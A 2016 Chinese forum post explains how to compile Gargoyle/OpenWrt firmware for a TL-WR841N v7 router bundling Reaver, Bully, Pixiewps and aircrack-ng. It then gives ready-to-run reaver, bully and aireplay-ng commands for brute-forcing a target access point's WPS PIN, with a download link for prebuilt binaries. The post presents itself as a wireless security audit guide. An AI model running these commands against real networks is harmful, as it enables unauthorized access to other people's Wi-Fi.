|
|
本帖最后由 7440909 于 2016-12-30 14:25 编辑
特别注意:发布的工具仅作无线安全审计之用途,切勿用于非法用途!!!!
0. 841Nv7可用的Reaver (可能适用于ar71xx全平台),具体下载附件查看(在编译步骤部分)。附件包含编译841Nv7和720Nv3可用的Reaver的包的Makefile 和 patch ,包括aircrack-ng libpcap-old【旧版的libpcap(Reaver只能使用libpcap1.1.1 才能正常工作)】 Pixiewps Reaver Bully libpcre lrzsz,aircrack-ng 依赖于libpcap1.5.3。reaver运行于841Nv7,被测试对象为TL-WR740N v5/v6,工作正常
0.0 reaver 是 commit 1ff206d66a750416d314ee539442f7047e7ee561 更改依赖为libpcap1.1.1 ,具体看patch文件内容
aircrack-ng 是 commit 9a1846507ff043c397257206ff21adae90a122f4
1. 具体编译步骤如下,所有测试均在Ubuntu 16.04 LTS 64 位下进行(如何安装ubuntu不在本次讨论之列,请自行Google),以gargoyle (commit 0bdf9ce4a82100e7a3e642705bc9dcf7ab49e661)为例做详细说明(原生Openwrt及LEDE未作测试,有时间和精力测试的朋友希望能不吝将你们的测试过程及结果发表,加深交流)
1.1 首先下载如下附件,解压备用:
1.2 准备工作,Ctrl+Alt+T 打开终端( 参考http://www.gargoyle-router.com/w ... loper_documentation)
- sudo apt-get install git build-essential asciidoc binutils bzip2 gawk gettext git libncurses5-dev libz-dev patch unzip zlib1g-dev lib32gcc1 libc6-dev-i386 subversion flex uglifyjs git-core gcc-multilib p7zip p7zip-full msmtp libssl-dev texinfo
- git clone http://github.com/ericpaulbishop/gargoyle.git
- cd gargoyle
- git checkout 0bdf9ce4a82100e7a3e642705bc9dcf7ab49e661
1.4 对gargoyle源码应用patch,本步骤有2个作用,a、更改默认语言为中文,这样编译出来的固件直接是中文;b、只让gargoyle做前期的准备工作而不是一口气完全编译,免去一些不必要的时间及资源浪费,因为很多包我们是不需要的。具体步骤如下
1.4.1 将下载解压后的Gargoyle/patches目录下的 000-DefaultChinese-TimezoneBugFix.patch 000-FixIp-fullWithQosmonIssue.patch 001-CancelAutomaticCompilation.patch 三个文件复制到源码目录(即上一步获取到的源码目录 gargoyle)
1.4.2 回到终端继续执行
- patch -p1< 000-DefaultChinese-TimezoneBugFix.patch
- patch -p1< 000-FixIp-fullWithQosmonIssue.patch
- patch -p1< 001-CancelAutomaticCompilation.patch
这样对源码的修改就完成了,至于具体修改的是那些地方,可以直接用文本编辑器打开.patch文件查看
1.5 更进一步的准备工作, 继续在终端执行如下命令
等到终端出现 OpenWrt Configuration 窗口时直接选择EXIT退出,是否保存选择YES或NO无所谓,然后等到出现BUILDING BANNER时表示已完成custom-src的准备
1.6 将gargoyle目录下的custom-src 重命名为custom-src.841N后,执行patch,本步骤的目的是更改默认4M固件为8M,至于具体修改的是那些地方,可以直接用文本编辑器打开.patch文件查看
1.6.1 将下载解压后的Gargoyle/patches目录下的003-Change4MTo8MFirmware.patch 复制到源码目录custom-src.841N (即上一步获取到的源码目录 gargoyle/custom-src.841N)
1.6.1 还是在终端中执行如下命令
- cd custom-src.841N
- patch -p1<003-Change4MTo8MFirmware.patch
1.7 安装各种app源代码
- ./scripts/feeds update -a
- ./scripts/feeds install -a -p
- rm -frv ./feeds/packages/net/aircrack-ng
1.10 复制下载附件解压后文件夹 Gargoyle/config/ 中的 .config 到 custom-src.841N
1.11 回到终端 执行
选择需要的包,然后保存。
1.12 准备工作完成,直接编译(了解 make -j 参数 )
大约3~4小时可以完成编译。视网络和计算机性能而定。编译完成的固件的密码为gargoyle官方固件的密码是一样的,为 password
2.0 编译出的reaver具体的使用方法如下
2.1 由于路由性能的影响,在841Nv7上运行reaver必须配合aireplay-ng才能正常工作。即需要在ubuntu 下 ssh登录841Nv7两次,开启两个ssh会话窗口。当然最好是使用GNU screen,关于screen的使用亦不在本次讨论之列,具体请Google
2.2 启用网卡混杂模式 ,在其中一个会话窗口执行
- ifconfig wlan0 down && sleep 10 && airmon-ng start wlan0 && sleep 10 && airmon-ng stop wlan0mon && sleep 10 && ifconfig wlan0 down && sleep 10 && airmon-ng start wlan0
执行多次是为了消除不确定因素的影响
2.3 执行
查看网络信息, 假设测试对象的mac 为14:75:90:5E:BA:32
2.4 在其中一个会话窗口执行 ( 这一条一定要先执行)
- reaver -i wlan0mon -b 14:75:90:5E:BA:32 -vvv -N -S -A --delay=2 --lock-delay=10 --recurring-delay=5:20
- watch aireplay-ng -1 5 -a 14:75:90:5E:BA:32 wlan0mon
3.0 bully 也可以运行,具体命令为
- bully -b 14:75:90:5E:BA:32 -v 4 -l 10 -D -A -B -F wlan0mon
4.0 附已编译的文件下载,如失效,不要反馈,因为电脑上的文件已删除。
链接: https://pan.baidu.com/s/1c1Q8wKC 密码: jawi 解压密码:ReaverrevaeR6c42695018ef7629a593b83387621b59 由于是8M固件,内存为32M一般不能从网页升级,只能从breed页面升级(https://www.right.com.cn/forum/thread-161906-1-1.html)
最好是自己编译固件。
5.0 参考
https://github.com/aircrack-ng/aircrack-ng
https://github.com/t6x/reaver-wps-fork-t6x
https://github.com/t6x/reaver-wps-fork-t6x/tree/Big_endian
http://03k.org/openwrt-reaver.html
https://forums.hak5.org/index.ph ... ewps-11-reaver-152/
https://github.com/aanarchyy/bully
再次重申:工具仅作无线安全审计之用途,切勿用于非法用途!!!!
请勿询问除841Nv7外的其他平台,本人无其他平台设备。也不要对固件提其他要求,本文的核心不在于固件。
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?立即注册
×
|
简体中文
繁體中文
English
日本語
Deutsch
한국 사람
بالعربية
TÜRKÇE
português
คนไทย
IP卡
狗仔卡
发表于 2016-12-30 14:25
置顶卡
沉默卡
喧嚣卡
顶贴卡
显身卡
